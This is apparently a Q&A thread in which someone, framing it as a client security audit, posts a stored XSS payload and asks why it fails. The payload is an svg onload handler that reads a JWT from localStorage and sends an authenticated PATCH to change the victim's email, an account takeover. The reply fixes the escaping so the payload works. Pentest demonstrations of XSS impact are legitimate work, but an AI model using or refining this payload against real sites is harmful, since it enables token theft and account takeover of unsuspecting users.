# quotes on xmlhttp post json data(javascript) giving some errors when send inside another json variable

Tags: javascript, json, http, security, xss

I am doing a audit on a web application for vulnerabilities for a client. I found some xss but I want to escalate it more but the problem I am facing is that the data is sent inside json. And now when I am introducing xmlhttp request inside it which needs double quotes to send its POST data. Thats where the problem is coming in escaping those quotes.

I tried escaping it with two backslashes but that failed the request. But when I sent the request with one backslash in payload the request succeeded but javascript execution failed

So basically the problem is data is sent like this :

POST
{"x":"y","html":"javascript code"}

My payload of xss is this :

```
POST 

DATA
{"x":"y","html":"<svg onload=\"var token=localStorage.getItem('murally.jwt');
alert(token);
var xhr=new XMLHttpRequest();xhr.open('PATCH','https://x.com',true);
xhr.setRequestHeader('Accept', 'application/json');xhr.setRequestHeader('Content-Type','application/json; charset=utf-8');
xhr.setRequestHeader('Authorization', 'Bearer ' + token);var body='{\"email\":\"xxx@xxx.com\"}';
xhr.send(JSON.stringify(body));
xhr.onreadystatechange = function() { if (this.readyState == 4 && this.status 
== 200) { alert(xhr.responseText) }};\"/>"}
```

Now in this I am stuck from two sides:

1) When I send the same code as above in request, data get stored on server side but when I load the page where this get stored, there is error in console that SyntaxError: '' string literal contains an unescaped line break, so my payload didnt works and fail.

2) After searching for it on internet I found a solution for above that I need to double escape the quotes on post data for the browser to parse it correctly,but when I send that request again with double backslashes another problem arised that the request failed with error
{"error":"INVALID_PAYLOAD","message":"Malformed JSON"}

So now I have to somehow make that request to work properly bypassing both the errors, is there nay solution to this. I am not much in the development side so if any help would be highly appreciated. I want to show my client a high impact of xss that how xss can lead to account takeover. If there is a way to mitigate these both problems with proper escaping then please help me.
If you need more information feel free to ask.

Thanks.

Comment: You can remove all line breaks and store `html` string as a one-line compact text.

Comment: @shaochuancs thanks for replying, in html there is also a place where double quotes are there var body='{\"email\":\"xxx@xxx.com\"}; ,  so if its in double quote it will break the outside json and the request will give a invalid payload message. And also it itself is json so it also must contain double quotes. Any solution?

Comment: The double quote in `body` is not necessary, please check my answer.

Answer (score 0):

There are 2 problems in your payload:

1. For value of `html` field, no line break should be introduced -- it will cause "unescaped line break" error. You can remove all line breaks and store `html` string as a one-line compact text.
2. For `body` in the payload, it can be a plain JavaScript object, such as `var body={email:'xxx@xxx.com'};` -- in the next code line, it would be converted to JSON string via `JSON.stringify(body)`, the double quote is not necessary.